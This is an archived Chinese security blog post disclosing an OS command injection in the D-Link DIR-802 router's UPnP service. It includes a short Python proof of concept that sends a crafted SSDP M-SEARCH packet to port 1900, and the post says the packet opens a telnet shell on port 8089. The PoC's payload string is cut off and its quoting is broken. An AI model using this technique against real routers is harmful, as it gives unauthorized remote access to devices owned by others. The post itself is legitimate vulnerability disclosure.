1059 lines
28 KiB
HTML
1059 lines
28 KiB
HTML
|
<!DOCTYPE html>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<html class="theme-next gemini use-motion" lang="zh-Hans">
|
|||
|
<head><meta name="generator" content="Hexo 3.8.0">
|
|||
|
<meta charset="UTF-8">
|
|||
|
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
|||
|
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
|
|||
|
<meta name="theme-color" content="#222">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<meta http-equiv="Cache-Control" content="no-transform">
|
|||
|
<meta http-equiv="Cache-Control" content="no-siteapp">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
|
|||
|
|
|||
|
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
|
|||
|
|
|||
|
|
|||
|
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
|
|||
|
|
|||
|
|
|||
|
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
|
|||
|
|
|||
|
|
|||
|
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
|
|||
|
|
|||
|
|
|||
|
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<meta name="keywords" content="D-LINK,UPnP,固件模拟,">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<meta name="description" content="D-LINK DIR-802 命令注入漏洞 by Cool 漏洞已提交厂商https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206 漏洞类型CWE-78: Improper Neutralization of Special Elements used in an OS Command">
|
|||
|
<meta name="keywords" content="D-LINK,UPnP,固件模拟">
|
|||
|
<meta property="og:type" content="article">
|
|||
|
<meta property="og:title" content="DIR-802 OS Command Injection">
|
|||
|
<meta property="og:url" content="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/index.html">
|
|||
|
<meta property="og:site_name" content="混元霹雳手">
|
|||
|
<meta property="og:description" content="D-LINK DIR-802 命令注入漏洞 by Cool 漏洞已提交厂商https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206 漏洞类型CWE-78: Improper Neutralization of Special Elements used in an OS Command">
|
|||
|
<meta property="og:locale" content="zh-Hans">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665628/cve/carbon.png">
|
|||
|
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665899/cve/carbon_1.png">
|
|||
|
<meta property="og:updated_time" content="2021-03-02T06:27:53.309Z">
|
|||
|
<meta name="twitter:card" content="summary">
|
|||
|
<meta name="twitter:title" content="DIR-802 OS Command Injection">
|
|||
|
<meta name="twitter:description" content="D-LINK DIR-802 命令注入漏洞 by Cool 漏洞已提交厂商https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206 漏洞类型CWE-78: Improper Neutralization of Special Elements used in an OS Command">
|
|||
|
<meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665628/cve/carbon.png">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" id="hexo.configurations">
|
|||
|
var NexT = window.NexT || {};
|
|||
|
var CONFIG = {
|
|||
|
root: '/',
|
|||
|
scheme: 'Gemini',
|
|||
|
version: '5.1.4',
|
|||
|
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
|
|||
|
fancybox: true,
|
|||
|
tabs: true,
|
|||
|
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
|
|||
|
duoshuo: {
|
|||
|
userId: '0',
|
|||
|
author: '博主'
|
|||
|
},
|
|||
|
algolia: {
|
|||
|
applicationID: '',
|
|||
|
apiKey: '',
|
|||
|
indexName: '',
|
|||
|
hits: {"per_page":10},
|
|||
|
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
|
|||
|
}
|
|||
|
};
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<link rel="canonical" href="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<title>DIR-802 OS Command Injection | 混元霹雳手</title>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</head>
|
|||
|
|
|||
|
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="container sidebar-position-left page-post-detail">
|
|||
|
<div class="headband"></div>
|
|||
|
|
|||
|
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
|
|||
|
<div class="header-inner"><div class="site-brand-wrapper">
|
|||
|
<div class="site-meta ">
|
|||
|
|
|||
|
|
|||
|
<div class="custom-logo-site-title">
|
|||
|
<a href="/" class="brand" rel="start">
|
|||
|
<span class="logo-line-before"><i></i></span>
|
|||
|
<span class="site-title">混元霹雳手</span>
|
|||
|
<span class="logo-line-after"><i></i></span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
<p class="site-subtitle"></p>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
<div class="site-nav-toggle">
|
|||
|
<button>
|
|||
|
<span class="btn-bar"></span>
|
|||
|
<span class="btn-bar"></span>
|
|||
|
<span class="btn-bar"></span>
|
|||
|
</button>
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
<nav class="site-nav">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<ul id="menu" class="menu">
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-home">
|
|||
|
<a href="/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
|
|||
|
|
|||
|
首页
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-about">
|
|||
|
<a href="/about/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
|
|||
|
|
|||
|
关于
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-tags">
|
|||
|
<a href="/tags/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
|
|||
|
|
|||
|
标签
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-categories">
|
|||
|
<a href="/categories/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
|
|||
|
|
|||
|
分类
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-archives">
|
|||
|
<a href="/archives/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
|
|||
|
|
|||
|
归档
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-bookmarks">
|
|||
|
<a href="/bookmarks/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
|
|||
|
|
|||
|
书签
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
<li class="menu-item menu-item-hack之外">
|
|||
|
<a href="/hack之外/" rel="section">
|
|||
|
|
|||
|
<i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
|
|||
|
|
|||
|
HACK之外
|
|||
|
</a>
|
|||
|
</li>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</ul>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</nav>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</header>
|
|||
|
|
|||
|
<main id="main" class="main">
|
|||
|
<div class="main-inner">
|
|||
|
<div class="content-wrap">
|
|||
|
<div id="content" class="content">
|
|||
|
|
|||
|
|
|||
|
<div id="posts" class="posts-expand">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-block">
|
|||
|
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/">
|
|||
|
|
|||
|
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
|
|||
|
<meta itemprop="name" content="Cool-Y">
|
|||
|
<meta itemprop="description" content>
|
|||
|
<meta itemprop="image" content="/images/avatar.png">
|
|||
|
</span>
|
|||
|
|
|||
|
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
|
|||
|
<meta itemprop="name" content="混元霹雳手">
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
<header class="post-header">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<h1 class="post-title" itemprop="name headline">DIR-802 OS Command Injection</h1>
|
|||
|
|
|||
|
|
|||
|
<div class="post-meta">
|
|||
|
<span class="post-time">
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-calendar-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="post-meta-item-text">发表于</span>
|
|||
|
|
|||
|
<time title="创建于" itemprop="dateCreated datePublished" datetime="2021-03-02T13:36:32+08:00">
|
|||
|
2021-03-02
|
|||
|
</time>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
<span class="post-category">
|
|||
|
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-folder-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="post-meta-item-text">分类于</span>
|
|||
|
|
|||
|
|
|||
|
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
|
|||
|
<a href="/categories/IOT/" itemprop="url" rel="index">
|
|||
|
<span itemprop="name">IOT</span>
|
|||
|
</a>
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span id="/2021/03/02/DIR-802-OS-Command-Injection/" class="leancloud_visitors" data-flag-title="DIR-802 OS Command Injection">
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-eye"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="post-meta-item-text">阅读次数:</span>
|
|||
|
|
|||
|
<span class="leancloud-visitors-count"></span>
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-wordcount">
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-file-word-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span title="字数统计">
|
|||
|
372 字
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-clock-o"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span title="阅读时长">
|
|||
|
1 分钟
|
|||
|
</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</header>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-body" itemprop="articleBody">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<h3 id="D-LINK-DIR-802-命令注入漏洞"><a href="#D-LINK-DIR-802-命令注入漏洞" class="headerlink" title="D-LINK DIR-802 命令注入漏洞"></a>D-LINK DIR-802 命令注入漏洞</h3><blockquote>
|
|||
|
<p>by Cool</p>
|
|||
|
</blockquote>
|
|||
|
<h4 id="漏洞已提交厂商"><a href="#漏洞已提交厂商" class="headerlink" title="漏洞已提交厂商"></a>漏洞已提交厂商</h4><p><a href="https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206" target="_blank" rel="noopener">https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206</a></p>
|
|||
|
<h4 id="漏洞类型"><a href="#漏洞类型" class="headerlink" title="漏洞类型"></a>漏洞类型</h4><p>CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)</p>
|
|||
|
<h4 id="受影响设备及软件版本"><a href="#受影响设备及软件版本" class="headerlink" title="受影响设备及软件版本"></a>受影响设备及软件版本</h4><p>DIR-802 hardware revision Ax before v1.00b05<br><a href="https://pmdap.dlink.com.tw/PMD/GetAgileFile?itemNumber=FIR1300450&fileName=DIR802_FW100b05.zip&fileSize=6163759.0" target="_blank" rel="noopener">https://pmdap.dlink.com.tw/PMD/GetAgileFile?itemNumber=FIR1300450&fileName=DIR802_FW100b05.zip&fileSize=6163759.0</a>;</p>
|
|||
|
<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>DIR-802中存在一个命令注入漏洞,攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。</p>
|
|||
|
<h4 id="漏洞详情"><a href="#漏洞详情" class="headerlink" title="漏洞详情"></a>漏洞详情</h4><p>与CVE-2020-15893相似,在固件版本v-1.00b05之前的D-Link DIR-802 A1上发现了一个问题。默认情况下,端口1900上启用了通用即插即用(UPnP)。攻击者可以通过将有效负载注入SSDP M-SEARCH发现数据包的“搜索目标”(ST)字段来执行命令注入。</p>
|
|||
|
<h4 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">buf = <span class="string">'M-SEARCH * HTTP/1.1\r\nHOST:192.168.0.1:1900\r\nST:urn:schemas-upnp-org:service</span></span><br><span class="line"><span class="string">s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</span></span><br><span class="line"><span class="string">s.connect(("192.168.0.1", 1900))</span></span><br><span class="line"><span class="string">s.send(buf)</span></span><br><span class="line"><span class="string">s.close()</span></span><br></pre></td></tr></table></figure>
|
|||
|
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><p>使用firmadyne进行固件模拟,运行UPnP服务<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665628/cve/carbon.png" alt><br>攻击者可以是连接到路由器局域网内并且能够向UPnP端口发送请求的任何人。可以通过编写简单的python脚本将精心制作的数据包发送到特定的upnp端口,该脚本随后将作为精心制作的请求的一部分执行提供的命令。共享的POC将打开端口8089上的telnet服务。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665899/cve/carbon_1.png" alt></p>
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div>
|
|||
|
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
|
|||
|
<div>您的支持将鼓励我继续创作!</div>
|
|||
|
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
|
|||
|
<span>打赏</span>
|
|||
|
</button>
|
|||
|
<div id="QR" style="display: none;">
|
|||
|
|
|||
|
|
|||
|
<div id="wechat" style="display: inline-block">
|
|||
|
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
|
|||
|
<p>微信支付</p>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div id="alipay" style="display: inline-block">
|
|||
|
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
|
|||
|
<p>支付宝</p>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<footer class="post-footer">
|
|||
|
|
|||
|
<div class="post-tags">
|
|||
|
|
|||
|
<a href="/tags/D-LINK/" rel="tag"># D-LINK</a>
|
|||
|
|
|||
|
<a href="/tags/UPnP/" rel="tag"># UPnP</a>
|
|||
|
|
|||
|
<a href="/tags/固件模拟/" rel="tag"># 固件模拟</a>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-nav">
|
|||
|
<div class="post-nav-next post-nav-item">
|
|||
|
|
|||
|
<a href="/2021/01/08/nvram-config/" rel="next" title="自动化获取nvram配置">
|
|||
|
<i class="fa fa-chevron-left"></i> 自动化获取nvram配置
|
|||
|
</a>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
<span class="post-nav-divider"></span>
|
|||
|
|
|||
|
<div class="post-nav-prev post-nav-item">
|
|||
|
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</footer>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</article>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-spread">
|
|||
|
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="comments" id="comments">
|
|||
|
|
|||
|
<div id="gitment-container"></div>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="sidebar-toggle">
|
|||
|
<div class="sidebar-toggle-line-wrap">
|
|||
|
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
|
|||
|
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
|
|||
|
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
|
|||
|
</div>
|
|||
|
</div>
|
|||
|
|
|||
|
<aside id="sidebar" class="sidebar">
|
|||
|
|
|||
|
<div class="sidebar-inner">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<ul class="sidebar-nav motion-element">
|
|||
|
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
|
|||
|
文章目录
|
|||
|
</li>
|
|||
|
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
|
|||
|
站点概览
|
|||
|
</li>
|
|||
|
</ul>
|
|||
|
|
|||
|
|
|||
|
<section class="site-overview-wrap sidebar-panel">
|
|||
|
<div class="site-overview">
|
|||
|
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
|
|||
|
|
|||
|
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
|
|||
|
|
|||
|
<p class="site-author-name" itemprop="name">Cool-Y</p>
|
|||
|
<p class="site-description motion-element" itemprop="description">没人比我更懂中医#MAGA</p>
|
|||
|
</div>
|
|||
|
|
|||
|
<nav class="site-state motion-element">
|
|||
|
|
|||
|
|
|||
|
<div class="site-state-item site-state-posts">
|
|||
|
|
|||
|
<a href="/archives/">
|
|||
|
|
|||
|
<span class="site-state-item-count">29</span>
|
|||
|
<span class="site-state-item-name">日志</span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="site-state-item site-state-categories">
|
|||
|
<a href="/categories/index.html">
|
|||
|
<span class="site-state-item-count">7</span>
|
|||
|
<span class="site-state-item-name">分类</span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="site-state-item site-state-tags">
|
|||
|
<a href="/tags/index.html">
|
|||
|
<span class="site-state-item-count">53</span>
|
|||
|
<span class="site-state-item-name">标签</span>
|
|||
|
</a>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
</nav>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="links-of-author motion-element">
|
|||
|
|
|||
|
<span class="links-of-author-item">
|
|||
|
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
|
|||
|
|
|||
|
<i class="fa fa-fw fa-github"></i>GitHub</a>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="links-of-author-item">
|
|||
|
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
|
|||
|
|
|||
|
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
|
|||
|
</span>
|
|||
|
|
|||
|
<span class="links-of-author-item">
|
|||
|
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
|
|||
|
|
|||
|
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
|
|||
|
</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
<div id="music163player">
|
|||
|
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="450" src="//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=430"></iframe>
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</section>
|
|||
|
|
|||
|
|
|||
|
<!--noindex-->
|
|||
|
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
|
|||
|
<div class="post-toc">
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#D-LINK-DIR-802-命令注入漏洞"><span class="nav-text">D-LINK DIR-802 命令注入漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞已提交厂商"><span class="nav-text">漏洞已提交厂商</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞类型"><span class="nav-text">漏洞类型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#受影响设备及软件版本"><span class="nav-text">受影响设备及软件版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞概要"><span class="nav-text">漏洞概要</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞详情"><span class="nav-text">漏洞详情</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#POC"><span class="nav-text">POC</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a></li></ol></li></ol></div>
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</section>
|
|||
|
<!--/noindex-->
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</aside>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</main>
|
|||
|
|
|||
|
<footer id="footer" class="footer">
|
|||
|
<div class="footer-inner">
|
|||
|
<div class="copyright">© 2019 — <span itemprop="copyrightYear">2021</span>
|
|||
|
<span class="with-love">
|
|||
|
<i class="fa fa-user"></i>
|
|||
|
</span>
|
|||
|
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
|
|||
|
|
|||
|
|
|||
|
<span class="post-meta-divider">|</span>
|
|||
|
<span class="post-meta-item-icon">
|
|||
|
<i class="fa fa-area-chart"></i>
|
|||
|
</span>
|
|||
|
|
|||
|
<span title="Site words total count">100.6k</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<div class="busuanzi-count">
|
|||
|
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
|
|||
|
|
|||
|
|
|||
|
<span class="site-uv">
|
|||
|
<i class="fa fa-user"></i>
|
|||
|
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<span class="site-pv">
|
|||
|
<i class="fa fa-eye"></i>
|
|||
|
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
|
|||
|
|
|||
|
</span>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
</footer>
|
|||
|
|
|||
|
|
|||
|
<div class="back-to-top">
|
|||
|
<i class="fa fa-arrow-up"></i>
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</div>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript">
|
|||
|
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
|
|||
|
window.Promise = null;
|
|||
|
}
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
|
|||
|
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<!-- LOCAL: You can save these files to your site and update links -->
|
|||
|
|
|||
|
|
|||
|
<link rel="stylesheet" href="https://jjeejj.github.io/css/gitment.css">
|
|||
|
<script src="https://jjeejj.github.io/js/gitment.js"></script>
|
|||
|
|
|||
|
<!-- END LOCAL -->
|
|||
|
|
|||
|
|
|||
|
|
|||
